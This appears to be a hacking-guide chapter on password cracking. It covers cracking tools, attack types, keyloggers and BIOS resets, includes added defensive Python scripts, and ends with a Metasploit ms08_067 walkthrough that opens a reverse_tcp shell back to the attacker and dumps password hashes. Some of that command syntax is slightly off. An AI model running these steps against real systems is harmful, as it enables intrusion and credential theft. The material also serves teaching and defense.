Hacking Password - 17

Passwords are one of the most common targets for hackers, and cracking them is often the simplest technique. Although most people think that a longer password is hard to crack, hackers know that most people neglect to protect their user credentials in the first place.

Confidential login information, such as a password, is one of the weakest links in technical security, because this security function depends entirely on secrecy. Once the secret leaks out, the doors are wide open and the system is easily compromised.

If you put yourself in the attacker's mind, you realize that there are many ways to learn a user's password, because passwords have so many weak points. The biggest problem with relying solely on passwords for security is that users often hand their credentials to other users. Whether the user reveals the password intentionally or unintentionally, once it has leaked there is no way to know who else knows it. At this point, it is important to remember that someone knowing a user's password does not make that person an authorized user on the network.

How to Crack Passwords

If hackers cannot obtain the password through guessing, social engineering, or a physical attack (discussed in detail in later chapters), they can instead use one of several password cracking tools, such as:

1. Cain & Abel – cracks NT LanManager (NTLM) and LM hashes, Cisco PIX and Cisco IOS hashes, RADIUS hashes, and Windows RDP passwords.

2. Elcomsoft Distributed Password Recovery – cracks PKCS, Microsoft Office, and PGP passwords. It can distribute the cracking work across up to 10000 networked computers, and it uses GPU acceleration, which can speed up cracking by as much as 50 times.

3. Elcomsoft System Recovery – resets Windows passwords, resets password expiration times, and sets up administrative credentials.

4. John the Ripper – cracks hashed passwords on Windows, Unix, and Linux.

5. Ophcrack – uses rainbow tables to crack Windows passwords.

6. Pandora – cracks offline or online user passwords of Novell NetWare accounts.

7. Active System Password Recovery – recovers any password stored locally on a Windows operating system, including login passwords, VPN, RAS, SYSKEY, and even WEP or WPA connection keys.

8. RainbowCrack – uses rainbow tables to crack MD5 and LanManager hashes.

Note that some of these tools require physical access to the system being attacked. Remember, too, that once a hacker has physical access to a system you intend to protect, he can dig out every password-protected or encrypted file you own, as long as he has the right tools.

When testing a password cracking strategy, one of the most important things to remember is that the technique you need depends on the type of encryption protecting the password you want to crack. Also, if you are testing password cracking, keep in mind that some systems lock out the affected user after repeated failures, which can amount to a denial of service for legitimate users on the network.
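The lockout point above has a defensive flip side: the same burst of failed logins that triggers a lockout is exactly what a detection rule should flag, so the security team can tell a real cracking attempt from a user who simply forgot a password. The script below is an added example written for this article, not code from the original post; the log format and the account names are constructed for illustration, and the threshold (five failures inside ten minutes) is an assumed policy value, not one the article specifies.

```python
"""Flag brute-force style login failures in a constructed authentication log.

Added example for this article. The log format (timestamp, result, account,
source IP) and all sample lines are constructed; the threshold and window
are assumed policy values, not figures from the article.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: alice is hammered by one source, bob fails twice
# 40 minutes apart (normal forgetfulness), carol logs in successfully.
SAMPLE_LOG = """\
2024-01-10T09:00:01 FAIL alice 198.51.100.7
2024-01-10T09:00:03 FAIL alice 198.51.100.7
2024-01-10T09:00:04 FAIL alice 198.51.100.7
2024-01-10T09:00:06 FAIL alice 198.51.100.7
2024-01-10T09:00:08 FAIL alice 198.51.100.7
2024-01-10T09:00:09 FAIL alice 198.51.100.7
2024-01-10T09:05:00 FAIL bob 203.0.113.5
2024-01-10T09:45:00 FAIL bob 203.0.113.5
2024-01-10T10:00:00 OK carol 192.0.2.9
"""


def parse_log(text):
    """Parse the constructed format into (timestamp, result, account, ip) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, result, account, ip = line.split()
        events.append((datetime.fromisoformat(ts), result, account, ip))
    return events


def find_bursts(events, threshold=5, window=timedelta(minutes=10)):
    """Return {account: peak_failures} for accounts that reach `threshold`
    failed logins inside any sliding `window`.

    A sliding window, rather than a plain per-hour count, keeps bob's two
    widely spaced failures from being reported as an attack.
    """
    fails = defaultdict(list)
    for ts, result, account, _ip in events:
        if result == "FAIL":
            fails[account].append(ts)

    flagged = {}
    for account, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Advance the window start until all failures fit inside `window`.
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[account] = max(flagged.get(account, 0), count)
    return flagged


if __name__ == "__main__":
    for account, count in find_bursts(parse_log(SAMPLE_LOG)).items():
        print(f"possible password attack on {account}: {count} failures in window")
```

Run against the constructed log, only alice is reported (six failures in eight seconds); bob's two failures are 40 minutes apart and stay below the threshold. In practice the threshold should sit at or just below the system's lockout count, so the alert fires before users start getting locked out.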

Notes on Password Encryption

After a password is created, it is stored using a one-way hash algorithm, so the system keeps the password as a hashed string rather than in clear text. For obvious reasons the hash is not reversible, which means the password cannot be decrypted from it. Cracking passwords on a Linux operating system is harder still, because the operating system adds a "salt", a random value, to each password before hashing it. This makes every stored password more unique and prevents two users with the same password from ending up with the same hash value.
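The salt paragraph is easiest to understand by watching both cases side by side. The following is an added example for this article, not code from the original post: it hashes the same password for two users with and without a salt, and shows that a precomputed hash table (the idea behind the dictionary and rainbow attacks described below) matches the unsalted hash instantly but finds nothing against the salted one. The sample passwords and the tiny "precomputed table" are constructed; PBKDF2-HMAC-SHA256 with 200000 iterations is my choice of a salted, slow hash, not something the article specifies.

```python
"""Why salting matters: same password, same hash, unless a salt is added.

Added example for this article. Sample passwords and the 'precomputed table'
are constructed for illustration; the hash parameters are assumptions.
"""
import hashlib
import hmac
import os

ITERATIONS = 200_000  # assumed work factor for the slow, salted hash


def unsalted_hash(password):
    """Fast unsalted hash: identical passwords collide, and a precomputed
    table of hashes matches the stored value directly."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password, salt=None, iterations=ITERATIONS):
    """Salted, iterated hash (PBKDF2-HMAC-SHA256). Returns (salt, digest).

    A fresh random salt per user means two users with the same password get
    different digests, and a table built in advance is useless against them.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify(password, salt, expected, iterations=ITERATIONS):
    """Recompute with the stored salt and compare in constant time."""
    _, digest = salted_hash(password, salt, iterations)
    return hmac.compare_digest(digest, expected)


# Constructed 'precomputed table': hash -> plaintext for a few common words.
PRECOMPUTED = {unsalted_hash(w): w for w in ("password", "letmein", "welcome")}


def lookup_unsalted(stored_hash):
    """A plain table lookup recovers an unsalted hash of a common word."""
    return PRECOMPUTED.get(stored_hash)


def demo(password="password"):
    """Two users pick the same password; compare unsalted vs salted storage."""
    h1 = unsalted_hash(password)
    h2 = unsalted_hash(password)
    salt1, d1 = salted_hash(password)
    salt2, d2 = salted_hash(password)
    return {
        "unsalted_collide": h1 == h2,           # True: same hash for both users
        "salted_collide": d1 == d2,             # False: salts differ
        "table_hit_unsalted": lookup_unsalted(h1),   # 'password'
        "table_hit_salted": PRECOMPUTED.get(d1.hex()),  # None
        "verify_ok": verify(password, salt1, d1),
        "verify_wrong": verify(password + "x", salt1, d1),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The salt is not secret; it is stored next to the digest, and `verify` reads it back. Its job is only to make each user's hash unique, so an attacker who obtains the hash list has to attack each entry separately instead of once for everyone.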

However, with the right tools you can launch different types of attacks to try to recover or break the password. Here are some of them:

1. Dictionary attack

As the name suggests, these attacks try the words found in a dictionary against the system's password database. This type of attack easily finds weak passwords, as well as passwords that use alternative spellings, such as pa$$word in place of "password". The strength of a dictionary attack tool rests on the vocabulary it contains.

2. Brute Force Attack

These attacks can crack any type of password, because they try every combination of letters, special characters, and numbers until the password is found. The flaw of this technique is easy to guess: finding the password can take a very long time, especially for a strong password.

3. Rainbow Attack

Rainbow attacks are well suited to cracking hashed passwords, and they have a higher success rate. Rainbow attack tools also crack passwords faster than dictionary and brute force tools. The only flaw of this attack is that it can only find passwords of no more than 14 characters.

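The dictionary and brute force sections above describe exactly what a password policy should test for before accepting a new password: does it turn back into a dictionary word once common substitutions such as pa$$word are undone, and is the raw search space large enough that exhaustive guessing is impractical? The checker below is an added example for this article, not code from the original post. The wordlist and the substitution table are constructed and deliberately tiny (a real check loads a full dictionary), and the 60-bit minimum is an assumed policy value.

```python
"""Password-policy check against the dictionary and brute-force weaknesses
described above.

Added example for this article. WORDLIST, SUBSTITUTIONS and MIN_BITS are
constructed / assumed values, not figures from the article.
"""
import math
import string

# Constructed mini wordlist; a real deployment loads a large dictionary file.
WORDLIST = {"password", "letmein", "welcome", "dragon", "monkey"}

# Common character substitutions that dictionary tools undo (the article's
# pa$$word example). Constructed table.
SUBSTITUTIONS = str.maketrans({
    "$": "s", "5": "s", "@": "a", "4": "a", "0": "o",
    "1": "i", "!": "i", "3": "e", "7": "t",
})

MIN_BITS = 60  # assumed policy minimum for the brute-force keyspace


def normalized_forms(password):
    """Variants of a password that a dictionary tool would also try:
    lower-cased, trailing digits/punctuation stripped, substitutions undone."""
    lowered = password.lower()
    stripped = lowered.rstrip(string.digits + string.punctuation)
    return {
        lowered,
        stripped,
        lowered.translate(SUBSTITUTIONS),
        stripped.translate(SUBSTITUTIONS),
    }


def in_dictionary(password):
    """True if any normalized form of the password is a dictionary word."""
    return any(form in WORDLIST for form in normalized_forms(password))


def keyspace_bits(password):
    """Size of the brute-force search space, in bits, assuming the attacker
    knows only which character classes are used and the length."""
    size = 0
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(c.isdigit() for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)  # 32 ASCII punctuation characters
    return len(password) * math.log2(size) if size else 0.0


def assess(password, min_bits=MIN_BITS):
    """Return 'ok' or a rejection reason naming the attack the password is weak against."""
    if in_dictionary(password):
        return "reject: dictionary word, possibly with common substitutions"
    bits = keyspace_bits(password)
    if bits < min_bits:
        return f"reject: only {bits:.0f} bits of brute-force keyspace"
    return "ok"


if __name__ == "__main__":
    for candidate in ("pa$$word", "P@ssw0rd", "Password123!", "abc123", "Tr0ub4dor&3xKq9!Lmz"):
        print(f"{candidate!r}: {assess(candidate)}")
```

Note that the keyspace figure is an upper bound on what a brute force attack must search; a password that passes it can still be weak if it is built from words the tool's vocabulary contains, which is why the dictionary check runs first.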
Other Ways to Uncover Passwords

As mentioned earlier, the easiest way to crack a password is to gain physical access to the system you are attempting to crack. If you cannot run a cracking tool on the system, you can use the following techniques instead:

1. Keystroke logging

This can easily be one of the most effective techniques in password cracking, because it uses a recording device that captures the keystrokes typed on the keyboard. You can use keylogger software, such as KeyLogger Stealth and Spector Pro, or keylogger hardware such as KeyGhost.

2. Search for weak password storage

Too many applications store passwords locally on the computer, which leaves them vulnerable to hackers. Once you have physical access to the computer, you can easily find the password by searching for weak storage or simply by running a text search. If you are lucky, you can even find the stored password in the application itself.

3. Weak BIOS password

Many computers let users set a power-on password to protect the hardware settings held in the CMOS chip. However, these passwords can easily be reset by moving a single jumper on the motherboard or by unplugging the CMOS battery from the motherboard. You can also try your luck by searching online for the default login credentials of that type of motherboard.

4. Obtain the password remotely

If you cannot physically access the system or its location, you can still obtain the passwords stored locally on a system running the Windows operating system from a remote location, or even obtain the credentials of the system administrator account. You do this by first performing a spoofing attack, then following the steps below to use the SAM file in the target computer's registry:

1. Open Metasploit and enter the following command:

   msf> use /windows/smb/ms08_067_netapi

2. Next, enter the following command:

   msf (ms08_067_netapi)> set payload/windows/meterpreter/reverse_tcp

   After doing this, Metasploit will tell you that it needs the IP address of the target (RHOST) and the IP address of the device you are using (LHOST). If you have that information, set the addresses with the following commands:

   msf (ms08_067_netapi)> set RHOST [target IP address]
   msf (ms08_067_netapi)> set LHOST [your IP address]

3. Now execute the exploit by typing the following command:

   msf (ms08_067_netapi)> exploit

   This gives you a terminal prompt that lets you access the target computer remotely.

4. Get the password hashes

   Since most operating systems and applications store passwords in hashed form, you may not be able to see the user credentials you want right away. However, you can obtain the hash values and work on them later. To capture the hashes, use this command:

   Meterpreter> Hash Dump

   After entering it, you will see all the users on the system you are hacking, along with their hashed passwords. You can then try to crack these hashes using tools such as Cain & Abel.